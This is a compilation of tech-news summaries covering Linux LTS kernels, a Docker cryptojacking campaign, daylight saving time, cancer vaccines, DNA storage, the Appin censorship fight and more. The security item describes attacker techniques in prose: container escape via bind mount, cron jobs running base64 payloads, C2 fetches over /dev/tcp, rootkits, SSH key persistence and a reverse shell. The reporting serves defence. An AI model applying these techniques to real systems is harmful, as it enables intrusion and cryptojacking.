"Until recently, Linux kernel developers have been the ones keeping long-term support (LTS) versions of the Linux kernel patched and up to date," writes ZDNet.

"Then, because it was too much work with too little support, the Linux kernel developers decided to no longer support the older kernels." Greg Kroah-Hartman, the Linux kernel maintainer for the stable branch, announced that the Linux 4.14.336 release was the last maintenance update to the six-year-old LTS Linux 4.14 kernel series. It was the last of the line for 4.14. Or was it?

Kroah-Hartman had stated, "All users of the 4.14 kernel series must upgrade." Maybe not. OpenELA, a trade association of the Linux distributors CIQ (the company backing Rocky Linux), Oracle, and SUSE, is now offering — via its kernel-lts — a new lease on life for 4.14.

This renewed version, tagged with the following format — x.y.z-openela — is already out as v4.14.339-openela. The OpenELA acknowledges the large debt they owe to Kroah-Hartman and Sasha Levin of the Linux Kernel Stable project but underlines that their project is not affiliated with them or any of the other upstream stable maintainers. That said, the OpenELA team will automatically pull most LTS-maintained stable tree patches from the upstream stable branches. When there are cases where patches can't be applied cleanly, OpenELA kernel-lts maintainers will deal with these issues. In addition, a digest of non-applied patches will accompany each release of its LTS kernel, in mbox format.
"The OpenELA kernel-lts project is the first forum for enterprise Linux distribution vendors to pool our resources," an Oracle Linux SVP tells ZDNet, "and collaborate on those older kernels after upstream support for those kernels has ended." And the CEO of CIQ adds that after community support has ended, "We believe that open collaboration is the best way to maintain foundational enterprise infrastructure.

"Through OpenELA, vendors, users, and the open source community at large can work together to provide the longevity that professional IT organizations require for enterprise Linux."

Researchers at Cado Security Labs received an alert about a honeypot using the Docker Engine API. "A Docker command was received..." they write, "that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server's root directory..." Typically, this is exploited to write out a job for the Cron scheduler to execute... In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker's Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilise the vurl executable to retrieve the first stage payload from the C2 server... To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh
"Multiple user mode rootkits are deployed to hide malicious processes," they note. And one of the shell scripts "makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker's session from being appended to the history file... Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn't appear in the shell history once a new session has been spawned."

The same script also inserts "an attacker-controlled SSH key to maintain access to the compromised host," according to the article, retrieves a miner for the Monero cryptocurrency and then "registers persistence in the form of systemd services" for both the miner and an open source Golang reverse shell utility named Platypus.

It also delivers "various utilities," according to the blog Security Week, "including 'masscan' for host discovery." Citing CADO's researchers, they write that the shell script also "weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents." The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet... ["For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," the researchers writes.]

"This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers," Cado notes. "It's clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments."

Legislation proposed in California "aims to repeal Daylight saving time and put California permanently on Standard time," reports a San Diego news station:

In November 2018, California voters passed Prop 7, a measure that would allow the state legislature to change Daylight saving time by either keeping it year-round or getting rid of it altogether. However, this measure also requires approval by the U.S. Congress if California were to opt for year-round Daylight Saving Time. So far, nothing has materialized.

"I am really, really passionate about this bill," said State Assembly Member Tri Ta, who added it is finally time to listen to the will of the voters. He has drafted new legislation that to do away with twice-yearly time changes. However, his bill would put the Golden State onto year-round Standard time: a move that would not require federal action. Oregon and Washington state are also considering similar moves [though Oregon's bill appears stalled]. "If my bill is passed, we do not need congressional approval," Ta told CBS 8, "so that's a win-win for everyone...."

Ta said that his bill has the support of the California Medical Association, as well as sleep experts who say Standard time syncs better with our natural clocks. "So why don't we go along with science?" Ta added. "That's what I believe." One things most people seem to agree on: it's time to stop changing our clocks, which research has shown leads to higher rates of accidents as well as increased health risks.
"While this new bill continues to work its way through Sacramento, Daylight saving time is still a go here in California," the article points out, "starting 2 a.m. Sunday, when we set our clocks forward one hour."

But USA Today adds that across the rest of the country, "Most Americans — 62% — are in favor of ending the time change, according to an Economist/YouGov poll from last year."

A group of radio enthusiasts known as the "radio squirrels" are keeping the legacy of Morse code alive at KPH Maritime Radio, the last operational Morse code radio station in North America. Located in Point Reyes National Seashore, north of San Francisco, the station transmits maritime news and weather reports every Saturday, using vintage equipment dating back to World War II, reads a fast-paced story on The Atlantic. Despite the obsolescence of Morse code, the radio squirrels, along with a 17-year-old newcomer, are determined to preserve this unique form of communication.

"The Royal Swedish Academy of Sciences, which selects Nobel laureates in chemistry and physics, last week awarded Dr. Wu its Sjöberg Prize in honor of 'decisive contributions' to cancer research," reports CNN.

Their profile of the oncologist from Boston's Dana-Farber Cancer Institute notes Dr. Wu's research "has laid the scientific foundation for the development of cancer vaccines tailored to the genetic makeup of an individual's tumor." It's a strategy looking increasingly promising for some hard-to-treat cancers such as melanoma and pancreatic cancer, according to the results of early-stage trials, and may ultimately be widely applicable to many of the 200 or so forms of cancer...

The most common treatments for cancer — radiation therapy and chemotherapy — are like sledgehammers, striking all cells and often damaging healthy tissue. Since the 1950s, cancer researchers have been seeking a way to dial up the body's immune system, which naturally tries to fight cancer but is outsmarted by it, to attack tumor cells. Progress on that front was middling until about 2011 with the arrival of a class of drugs called checkpoint inhibitors, which boost the anti-tumor activity of T cells, an important part of the immune system... These drugs have helped some people with cancer who would have been given months to live survive for decades, but they don't work for all cancer patients, and researchers continue to look for ways to turbocharge the body's immune system against cancer...

Wu's research focused on small mutations in cancer tumor cells. These mutations, which occur as the tumor grows, create proteins that are slightly different to those in healthy cells. The altered protein generates what's called a tumor neoantigen that can be recognized by the immune system's T cells as foreign, and therefore susceptible to attack. With thousands of potential neoantigen candidates, Wu used "tour de force lab work" to identify the neoantigens that are on the cell surface, making them a potential target for a vaccine, said Urban Lendahl, professor of genetics at the Karolinska Institutet in Sweden and the secretary of the committee that awarded the prize. "If the immune system is to have a chance to attack the tumor, this difference must be manifested on the surface of the tumor cells. Otherwise, it's pretty pointless," Lendahl added...

By sequencing DNA from healthy and cancer cells, Wu and her team identified a cancer patient's unique tumor neoantigens. Synthetic copies of these unique neoantigens could be used as a personalized vaccine to activate the immune system to target the cancer cells... Once it had FDA approval, the team vaccinated six patients with advanced melanoma with a seven-shot course of patient-specific neoantigens vaccines. The breakthrough results were published in an 2017 article in Nature. For some patients, this treatment resulted in the immune system's cells being activated and targeting the tumor cells. The results, along with another paper published the same year led by the founders of mRNA vaccine company BioNTech, provided "proof of principle" that a vaccine can be targeted to a person's specific tumor, Lendahl said.

A follow-up by Wu's team four years after the patients received the vaccines published in 2021, showed that the immune responses were effective in keeping cancer cells under control... Since then, Wu's team, other groups of medical researchers and pharmaceutical companies, including Merck, Moderna and BioNTech, have further developed this field of research, with trials underway for vaccines that treat pancreatic and lung cancer as well as melanoma.
"All the trials underway are small-scale, typically involving a handful of patients with later-stage disease and a high tolerance for safety risks," adds CNN.

"To show that these type of cancer vaccines work, much larger randomized control trials are needed."

An anonymous reader shares a report: When Google Wallet launched in 2022, Google kept the "GPay" app around in a handful of countries. The company announced today that the old Google Pay app is soon going away in the US. That app, which appears as "GPay" on your Android homescreen, was Google's previous vision for mobile payments and finance.

It was "designed around your relationships with people and businesses" with conversation-like threads serving as a purchase history, while keeping track of your spending was another big aspect. GPay will stop working in the US from June 4, 2024. It will remain available for users in India and Singapore as Google continues to "build for the unique needs in those countries." As part of the app going away, Google is shutting down peer-to-peer payments that let you send, request, or receive money from others in the US. Google's P2P offering never really took off.

Andrew Feinberg, writing for Slate: If you wanted to design a financial channel that would cause investors to underperform the stock market, you'd create CNBC, NBC's financial counterpart that runs on cable news and ostensibly tries to make viewers better investors. You'd make it sober and rational (well, there is Jim Cramer, but we'll get to him later), no need to feature anyone foaming at the mouth about stocks that could triple in six months or worried Cassandras warning that it's time to sell everything and burrow underground. And yet, you'd ensure that viewers stay engaged by keeping them on edge, worried and confused about what might happen next. Anxiety, you'd discover, is your friend, viewer hypervigilance your bread and butter.

In other words, CNBC makes viewers nervous in a very specific way. Nervous that they're about to lose money in a market downturn. Nervous that they might miss a hot trend or stock. Or uncertain that they're in the right sectors. Then an "expert" comes on and says, "Hey, you're in the wrong sectors -- it's time to leave tech for industrials, financials, and health care." In its sober, rational way, the network creates a sense of urgency. Although its tone is never like that of an infomercial, sometimes the message is similar. Act now. The problem is, hypervigilance is probably the worst quality most investors can have. "Sit on your ass," the late Charlie Munger advised investors, emphasizing that when it comes to investing, less is more. Feeling nervous leads to excessive trading. And "all the evidence shows that individual investors do worse the more they trade," says Jay Ritter, professor of finance at the University of Florida's Warrington College of Business. "Buying and selling something based on what you see on CNBC is not likely to be a successful strategy."

Apple is probably at least 18 months away from launching a second-generation Vision Pro. Based on the early response to the first version, that may be a long time for some people to wait. Bloomberg: Since the Vision Pro debuted on Feb. 2, it's become clear that the mixed-reality headset is still a work in progress. Despite the dazzling demos -- and generally positive reviews -- it can be challenging to use on a daily basis. It's heavy. The interface doesn't always work smoothly. And it's hard to forget the fact that you paid $3,500 or more for this experience. Vision Pro loyalists stress that the current model is only the first generation. It will get better in time. Don't forget, they say, that the original iPhone, iPad and Apple Watch had their quirks too. If the headset feels too heavy, you're wearing it wrong. The narrower-than-expected field of view and glare? That's normal. Now, it's true that Apple's earlier first-generation products had their issues. The initial iPhone couldn't connect to 3G networks and lacked the App Store or even the ability to cut and paste. The iPad didn't have multitasking. The original Apple Watch was too sluggish and wasn't waterproof. But I don't think anyone complained that those devices were too cumbersome, an actual pain to use or too expensive to justify keeping.

[...] Apple isn't commenting on the Vision Pro's return rate, but data from sources at retail stores suggests that it's likely somewhere between average and above average compared with other products -- depending on the location. Some smaller stores are seeing one or two returns per day, but larger locations have seen as many as over eight take-backs in a single day. [...] Based on what I've seen so far, the demos have been effective -- maybe too effective. They sell consumers on an experience that doesn't quite exist yet. Some stores are seeing conversion rates after demos as high as 10% to 15%. That's an impressive number for a product with the Vision Pro's price tag.

High-capacity DNA data storage "is closer than you think," Slashdot wrote in 2019.

Now IEEE Spectrum brings an update on where we're at — and where we're headed — by a participant in the DNA storage collaboration between Microsoft and the Molecular Information Systems Lab of the Paul G. Allen School of Computer Science and Engineering at the University of Washington. "Organizations around the world are already taking the first steps toward building a DNA drive that can both write and read DNA data," while "funding agencies in the United States, Europe, and Asia are investing in the technology stack required to field commercially relevant devices." The challenging part is learning how to get the information into, and back out of, the molecule in an economically viable way... For a DNA drive to compete with today's archival tape drives, it must be able to write about 2 gigabits per second, which at demonstrated DNA data storage densities is about 2 billion bases per second. To put that in context, I estimate that the total global market for synthetic DNA today is no more than about 10 terabases per year, which is the equivalent of about 300,000 bases per second over a year. The entire DNA synthesis industry would need to grow by approximately 4 orders of magnitude just to compete with a single tape drive. Keeping up with the total global demand for storage would require another 8 orders of magnitude of improvement by 2030. But humans have done this kind of scaling up before. Exponential growth in silicon-based technology is how we wound up producing so much data. Similar exponential growth will be fundamental in the transition to DNA storage...

Companies like DNA Script and Molecular Assemblies are commercializing automated systems that use enzymes to synthesize DNA. These techniques are replacing traditional chemical DNA synthesis for some applications in the biotechnology industry... [I]t won't be long before we can combine the two technologies into one functional device: a semiconductor chip that converts digital signals into chemical states (for example, changes in pH), and an enzymatic system that responds to those chemical states by adding specific, individual bases to build a strand of synthetic DNA. The University of Washington and Microsoft team, collaborating with the enzymatic synthesis company Ansa Biotechnologies, recently took the first step toward this device... The path is relatively clear; building a commercially relevant DNA drive is simply a matter of time and money...

At the same time, advances in DNA synthesis for DNA storage will increase access to DNA for other uses, notably in the biotechnology industry, and will thereby expand capabilities to reprogram life. Somewhere down the road, when a DNA drive achieves a throughput of 2 gigabases per second (or 120 gigabases per minute), this box could synthesize the equivalent of about 20 complete human genomes per minute. And when humans combine our improving knowledge of how to construct a genome with access to effectively free synthetic DNA, we will enter a very different world... We'll be able to design microbes to produce chemicals and drugs, as well as plants that can fend off pests or sequester minerals from the environment, such as arsenic, carbon, or gold. At 2 gigabases per second, constructing biological countermeasures against novel pathogens will take a matter of minutes. But so too will constructing the genomes of novel pathogens. Indeed, this flow of information back and forth between the digital and the biological will mean that every security concern from the world of IT will also be introduced into the world of biology...

The future will be built not from DNA as we find it, but from DNA as we will write it.
The article makes an interesting point — that biology labs around the world already order chemically-synthesized ssDNA, "delivered in lengths of up to several hundred bases," and sequence DNA molecules up to thousands of bases in length.

"In other words, we already convert digital information to and from DNA, but generally using only sequences that make sense in terms of biology."

An anonymous reader quotes a report from Ars Technica: Nintendo's Satellaview, a Japan-only satellite add-on for the Super Famicom, is a rich target for preservationists because it was the home to some of the most ephemeral games ever released. That includes a host of content for Nintendo's own games, including F-Zero. That influential Super Nintendo (Super Famicom in Japan) racing title was the subject of eight weekly broadcasts sent to subscribing Japanese homes in 1996 and 1997, some with live "Soundlink" CD-quality music and voiceovers. When live game broadcasts were finished, the memory cartridges used to store game data would report themselves as empty, even though they technically were not. Keeping that same 1MB memory cartridge in the system when another broadcast started would overwrite that data, and there were no rebroadcasts.

As reported by Matthew Green at Press the Buttons (along with Did You Know Gaming's informative video), data from some untouched memory cartridges was found and used to re-create some of the content. Some courses, part of a multi-week "Grand Prix 2" event, have never been found, despite a $5,000 bounty offering and extensive effort. And yet, remarkably, the 10 courses in those later broadcasts were reverse-engineered, using a VHS recording, machine learning tools, and some manual pixel-by-pixel re-creation. The results are "north of 99.9% accurate," according to those who crafted it and exist now as a mod you can patch onto an existing F-Zero ROM. [...] Their work means that, 25 years later, a moment in gaming that was nearly lost to time and various corporate currents has been, if not entirely restored, brought as close as is humanly (and machine-ably) possible to what it once was.

Back in 2006 Slashdot reported on a 50-megabyte "micro" distro called Damn Small Linux. (And in 2012 we wrote that it "rose from the dead" with a new release candidate.)

Now Damn Small Linux has been reborn again, according to its developer's web site: Creating the original DSL, a versatile 50MB distribution, was a lot of fun and one of the things I am most proud of as a personal accomplishment. However, as a concept, it was in the right place at the right time, and the computer industry has changed a lot since then. While it would be possible to make a bootable Xwindows 50MB distribution today, it would be missing many drivers and have only a handful of very rudimentary applications. People would find such a distribution a fun toy or something to build upon, but it would not be usable for the average computer user out of the gate....

The new goal of DSL is to pack as much usable desktop distribution into an image small enough to fit on a single CD, or a hard limit of 700MB. This project is meant to service older computers and have them continue to be useful far into the future. Such a notion sits well with my values. I think of this project as my way of keeping otherwise usable hardware out of landfills.

As with most things in the GNU/Linux community, this project continues to stand on the shoulders of giants. I am just one guy without a CS degree, so for now, this project is based on antiX 23 i386... a fantastic distribution that I think shares much of the same spirit as the original DSL project. AntiX shares pedigree with MEPIS and also leans heavily on the geniuses at Debian.
The blog It's FOSS News describes it as "a unique experience in a sea of Debian-based and Fedora-based distros." It is offered with two window managers, Fluxbox and JWM, with apt being fully enabled by default for easy package installations... At the time of writing, only the Alpha ISOs were made available on the official downloads page. It is only a matter of time before we get a stable release.

Long-time Slashdot reader v3rgEz shared this report from MuckRock: Founded in 2003, Appin has been described as a cybersecurity company and an educational consulting firm. Appin was also, according to Reuters reporting and extensive marketing materials, a prolific "hacking for hire" service, stealing information from politicians and militaries as well as businesses and even unfaithful spouses.

Legal letters, being sent to newsrooms and organizations around the world, are trying to remove that story from the internet — and are often succeeding.

Reuters investigation, published in November, was based in part on corroborated marketing materials, detailing a range of "hacking for hire" services Appin provided. After publication, Reuters was targeted by a legal campaign to shut down critical reporting, an effort which expanded to target news organizations around the world, including MuckRock. With the help of the Electronic Frontier Foundation, MuckRock is now sharing more details on this effort while continuing to host materials the Association of Appin Training Centers has gone to great lengths to remove from the web.

The original story, by Reuters' staff writers Raphael Satter, Zeba Siddiqui and Chris Bing, is no longer available on the Reuters website. Following a preliminary court ruling issued in New Delhi, the story has been replaced with an editor's note, stating that Reuters "stands by its reporting and plans to appeal the decision." The story has since been reposted on Distributed Denial of Secrets, while the primary source materials that Reuters reporters and editors used in their reporting are available on MuckRock's DocumentCloud service.

Representatives of the company's founders denied the assertions in the Reuters story, insisting instead that rogue actors "were misusing the Appin name."
TechDirt titled their article "Sorry Appin, We're Not Taking Down Our Article About Your Attempts To Silence Reporters."

And Thursday the EFF wrote its own take on "a campaign of bullying and censorship seeking to wipe out stories about the mercenary hacking campaigns of a less well-known company, Appin Technology, in general, and the company's cofounder, Rajat Khare, in particular." These efforts follow a familiar pattern: obtain a court order in a friendly international jurisdiction and then misrepresent the force and substance of that order to bully publishers around the world to remove their stories. We are helping to push back on that effort, which seeks to transform a very limited and preliminary Indian court ruling into a global takedown order. We are representing Techdirt and MuckRock Foundation, two of the news entities asked to remove Appin-related content from their sites... On their behalf, we challenged the assertions that the Indian court either found the Reuters reporting to be inaccurate or that the order requires any entities other than Reuters and Google to do anything. We requested a response — so far, we have received nothing...

At the time of this writing, more than 20 of those stories have been taken down by their respective publications, many at the request of an entity called "Association of Appin Training Centers (AOATC)...." It is not clear who is behind The Association of Appin Training Centers, but according to documents surfaced by Reuters, the organization didn't exist until after the lawsuit was filed against Reuters in Indian court....

If a relatively obscure company like AOATC or an oligarch like Rajat Khare can succeed in keeping their name out of the public discourse with strategic lawsuits, it sets a dangerous precedent for other larger, better-resourced, and more well-known companies such as Dark Matter or NSO Group to do the same. This would be a disaster for civil society, a disaster for security research, and a disaster for freedom of expression.

Carl Franzen reports via VentureBeat: Hugging Face, the New York City-based startup that offers a popular, developer-focused repository for open source AI code and frameworks (and hosted last year's "Woodstock of AI"), today announced the launch of third-party, customizable Hugging Chat Assistants. The new, free product offering allows users of Hugging Chat, the startup's open source alternative to OpenAI's ChatGPT, to easily create their own customized AI chatbots with specific capabilities, similar both in functionality and intention to OpenAI's custom GPT Builder â" though that requires a paid subscription to ChatGPT Plus ($20 per month), Team ($25 per user per month paid annually), and Enterprise (variable pricing depending on the needs).

Phillip Schmid, Hugging Face's Technical Lead & LLMs Director, posted the news on the social network X (formerly known as Twitter), explaining that users could build a new personal Hugging Face Chat Assistant "in 2 clicks!" Schmid also openly compared the new capabilities to OpenAI's custom GPTs. However, in addition to being free, the other big difference between Hugging Chat Assistant and the GPT Builder and GPT Store is that the latter tools depend entirely on OpenAI's proprietary large language models (LLM) GPT-4 and GPT-4 Vision/Turbo. Users of Hugging Chat Assistant, by contrast, can choose which of several open source LLMs they wish to use to power the intelligence of their AI Assistant on the backend, including everything from Mistral's Mixtral to Meta's Llama 2. That's in keeping with Hugging Face's overarching approach to AI -- offering a broad swath of different models and frameworks for users to choose between -- as well as the same approach it takes with Hugging Chat itself, where users can select between several different open source models to power it.

"In the last few years, the U.S. has seen a boom in cryptocurrency mining," writes Ars Technica. But they add that the U.S. government "is now trying to track exactly what that means for the consumption of electricity. Specifically, a crucial branch of the U.S. Department of Energy.

"While its analysis is preliminary, the Energy Information Agency (EIA) estimates that large-scale cryptocurrency operations are now consuming over 2 percent of the U.S.'s electricity." That's roughly the equivalent of having added an additional state to the grid over just the last three years."

While there is some small-scale mining that goes on with personal computers and small rigs, most cryptocurrency mining has moved to large collections of specialized hardware. While this hardware can be pricy compared to personal computers, the main cost for these operations is electricity use, so the miners will tend to move to places with low electricity rates. The EIA report notes that, in the wake of a crackdown on cryptocurrency in China, a lot of that movement has involved relocation to the U.S., where keeping electricity prices low has generally been a policy priority.

One independent estimate made by the Cambridge Centre for Alternative Finance had the US as the home of just over 3 percent of the global bitcoin mining at the start of 2020. By the start of 2022, that figure was nearly 38 percent... The EIA decided it needed a better grip on what was going on... To better understand the implications of this major new drain on the U.S. electric grid, the EIA will be performing monthly analyses of bitcoin operations during the first half of 2024.
The Energy Information Agency identified 137 bitcoin mining operators, of which 101 responded to inquiries about their full-capacity power supply. "If running all-out, those 101 facilities would consume 2.3 percent of the US's average power demand," the article points out. And they add that in at least five instances, the Agency found bitcoin operators had "moved in near underutilized power plants and sent generation soaring again...

"These are almost certainly fossil fuel plants that might be reasonable candidates for retirement if it weren't for their use to supply bitcoin miners."

Dan Robinson reports via The Register: Quantum companies received 50 percent less venture cap funding last year as investors switched to generative AI or shied away from risky bets on Silicon Valley startups. Progress in quantum computing is being made, but practical applications of the technology are still likely years away. Investment in quantum technology reached a high of $2.2 billion in 2022, as confidence (or hype) grew in this emerging market, but that funding fell to about $1.2 billion last year, according to the latest State of Quantum report, produced by The Quantum Insider, with quantum computing company IQM, plus VCs OpenOcean and Lakestar. The picture is even starker in the US, where there was an 80 percent decline in venture capital for quantum, while the APAC region dropped by 17 percent, and EMEA grew slightly by three percent.

But the report denies that we have reached a "quantum winter," comparable with the "AI winter" periods of scarce funding and little progress. Instead, the quantum industry continues to progress towards useful quantum systems, just at a slower pace, and the decline in funding must be seen as part of broader venture capital trends, it insists. "Calendar year 2023 was an interesting year with regards to quantum," Heather West, research manager for Quantum Computing, Infrastructure Systems, Platforms, and Technology at IDC told The Register. "With the increased interest in generative AI, we started to observe that some of the funding that was being invested into quantum was transferred to AI initiatives and companies. Generative AI was seen as the new disruptive technology which end users could use immediately to gain an advantage or value, whereas quantum, while expected to be a disruptive technology, is still very early in development," West told The Register.

Gartner Research vice president Matthew Brisse agreed. "It's due to the slight shift of CIO priorities toward GenAI. If organizations were spending 10 innovation dollars on quantum, now they are spending five. Not abandoning it, but looking at GenAI to provide value sooner to the organization than quantum," he told us. Meanwhile, venture capitalists in America are fighting shy of risky bets on Silicon Valley startups and instead keeping their powder dry as they look to more established technology companies or else shore up their existing portfolio of investments, according to the Financial Times.

The pandemic may have proved to employeers that remote and flexible-work arrangements were viable — and changed the way we work forever. Axios writes: Just 6 out of 158 U.S. CEOs said they'll prioritize bringing workers back to the office full-time in 2024, according to a new survey released by the Conference Board. Executives are increasingly resigned to a world where employees don't come in every day, as hybrid work arrangements — mixing work from home and in-office — become the norm for knowledge workers. "Maintain hybrid work," was cited as a priority by 27% of the U.S. CEOs who responded to the survey, conducted in October and November. A separate survey of chief financial officers by Deloitte, conducted in November, found that 65% of CFOs expect their company to offer a hybrid arrangement this year.

"Remote work appears likely to be the most persistent economic legacy of the pandemic," write Goldman Sachs economists in a recent note. About 20%-25% of workers in the U.S. work from home at least part of the week, according to data Goldman cites. That's below a peak of 47% during the pandemic but well above its prior average of around 3%.

"The battle is over," said Diana Scott, human capital center leader at The Conference Board. "There are so many other issues CEOs are facing." Headlines about CEOs determined to get butts in seats get attention, but they are the exception, says Brian Elliott, the cofounder of Future Forum, a future of work think tank. "There are a lot more CEOs that are actually quietly becoming more flexible...." Though the labor market has softened, employers still do care about keeping employees satisfied — and they don't want to fight with them. "It's not worth the fight," says Elliott.

David Mills, the man who invented NTP and wrote the implementation, has passed away. He also created the Fuzzballs and EGP, and helped make global-scale internetworking possible. Vint Cerf, sharing the news on the Internet Society mail group: His daughter, Leigh, just sent me the news that Dave passed away peacefully on January 17, 2024. He was such an iconic element of the early Internet.

Network Time Protocol, the Fuzzball routers of the early NSFNET, INARG taskforce lead, COMSAT Labs and University of Delaware and so much more.

R.I.P.

Researchers have developed a way to apply quantum measurement to something no matter its mass or energy. "Our proposed experiment can test if an object is classical or quantum by seeing if an act of observation can lead to a change in its motion," says physicist Debarshi Das from UCL. ScienceAlert reports: Quantum physics describes a Universe where objects aren't defined by a single measurement, but as a range of possibilities. An electron can be spinning up and down, or have a high chance of existing in some areas more than others, for example. In theory, this isn't limited to tiny things. Your own body can in effect be described as having a very high probability of sitting in that chair and a very (very!) low probability of being on the Moon. There is just one fundamental truth to remember -- you touch it, you've bought it. Observing an object's quantum state, whether an electron, or a person sitting in a chair, requires interactions with a measuring system, forcing it to have a single measurement. There are ways to catch objects with their quantum pants still down, but they require keeping the object in a ground state -- super-cold, super-still, completely cut off from its environment. That's tricky to do with individual particles, and it gets a lot more challenging as the size of the scale goes up.

The new proposal uses an entirely novel approach, one that uses a combination of assertions known as Leggett-Garg Inequalities and No-Signaling in Time conditions. In effect, these two concepts describe a familiar Universe, where a person on a chair is sitting there even if the room is dark and you can't see them. Switching on the light won't suddenly reveal they're actually under the bed. Should an experiment find evidence that somehow conflicts with these assertions, we just might be catching a glimpse of quantum fuzziness on a larger scale.

The team proposes that objects can be observed as they oscillate on a pendulum, like a ball at the end of a piece of string. Light would then be flashed at the two halves of the experimental setup at different times -- counting as the observation -- and the results of the second flash would indicate if quantum behavior was happening, because the first flash would affect whatever was moving. We're still talking about a complex setup that would require some sophisticated equipment, and conditions akin to a ground state -- but through the use of motion and two measurements (light flashes), some of the restrictions on mass are removed. [...] "The next step is to try this proposed setup in an actual experiment," concludes the reports. "The mirrors at the Laser Interferometer Gravitational-Wave Observatory (LIGO) in the US have already been proposed as suitable candidates for examination."

"Those mirrors act as a single 10-kilogram (22-pound) object, quite a step up from the typical size of objects analyzed for quantum effects -- anything up to about a quintillionth of a gram."

The findings have been published in the journal Physical Review Letters.

Last April the Python Software Foundation warned that Europe's proposed Cyber Resilience Act jeopardized their organization and "the health of the open-source software community" with overly broad policies that "will unintentionally harm the users they are intended to protect."

They'd worried that the Python Software Foundation could incur financial liabilities just for hosting Python and its PyPI package repository due to the proposed law's attempts to penalize cybersecurity lapses all the way upstream. But a new blog post this week cites some improvements: We asked for increased clarity, specifically:

"Language that specifically exempts public software repositories that are offered as a public good for the purpose of facilitating collaboration would make things much clearer. We'd also like to see our community, especially the hobbyists, individuals and other under-resourced entities who host packages on free public repositories like PyPI be exempt."


The good news is that CRA text changed a lot between the time the open source community — including the PSF — started expressing our concerns and the Act's final text which was cemented on December 1st. That text introduces the idea of an "open source steward."

"'open-source software steward' means any legal person, other than a manufacturer, which has the purpose or objective to systematically provide support on a sustained basis for the development of specific products with digital elements qualifying as free and open-source software that are intended for commercial activities, and ensures the viability of those products;" (p. 76)


[...] So are we totally done paying attention to European legislation? Ah, while it would be nice for the Python community to be able to cross a few things off our to-do list, that's not quite how it works. Firstly, the concept of an "open source steward" is a brand new idea in European law. So, we will be monitoring the conversation as this new concept is implemented or interacts with other bits of European law to make sure that the understanding continues to reflect the intent and the realities of open source development. Secondly, there are some other pieces of legislation in the works that may also impact the Python ecosystem so we will be watching the Product Liability Directive and keeping up with the discussion around standard-essential patents to make sure that the effects on Python and open source development are intentional (and hopefully benevolent, or at least benign.)

We already know that a precise range of wavelengths within daylight triggers a light-sensitive photoreceptor in the back of your eye, causing the body's internal clock to reset.

Those receptors are called "intrinsically photosensitive retinal ganglion cells" (or ipRGCs), according to Science Alert — although the actual color is perceived by some nearby cones (which then send information back to those rceptors).

But are our bodies really affected specifically by the perceived color? Chronobiologist Christine Blume investigated with a team from Switzerland's University of Basel and Germany's Max Planck Institute for Biological Cybernetics: Modern scientific wisdom advises us to avoid devices that emit a significant amount of blue radiance, such as our smartphones, computer monitors, and tablets, when we ought to be wrapping ourselves in darkness and resting. There's perfectly sound reasoning for this — the ipRGCs in our eyes react to short wavelengths of electromagnetic radiation, roughly 490 nanometers in size... Given blue light scatters from the sky during daylight hours, it makes sense our eyes would use this wavelength as a cue to mark the beginning and end of sleep time...

Yet University of Basel chronobiologist Christine Blume had her suspicions that the way a light's mix of wavelengths influenced the color-reading cones could mean there's more to the phenomenon than meets the eye. "A study in mice in 2019 suggested that yellowish light has a stronger influence on the internal clock than bluish light," says Blume. To resolve whether the way cones perceive a range of wavelengths carries any weight in how the blue-triggered ipRGCs function, Blume and her team recruited eight healthy adult men and eight women in a 23-day-long experiment. After habituating to a specific bedtime for a week, the volunteers attended three visits to a lab where they were exposed to a constant controlled 'white' glow, a bright yellow, or dim blue light for one hour in the evening...

None of the analyses revealed any indication that the perceived color of the light affected the duration or quality of the volunteers' sleep patterns. Instead, all three light conditions caused a sleep delay, suggesting light in general has a more complicated impact than previously thought. That's not to say ipRGCs aren't affected by 'blue' wavelengths of light. Rather, white light that is packed with blue waves but stimulates cone cells into seeing yellows, reds, or purples could still affect our sleep cycles. Similarly, light that looks blue but isn't intense enough to provoke the ipRGCs into functioning might have little influence over our body's daily rhythms.

Phones of the future may one day allow us to switch into a night mode that we don't perceive in warmer tones.
Thanks to long-time Slashdot reader schwit1 for sharing the article.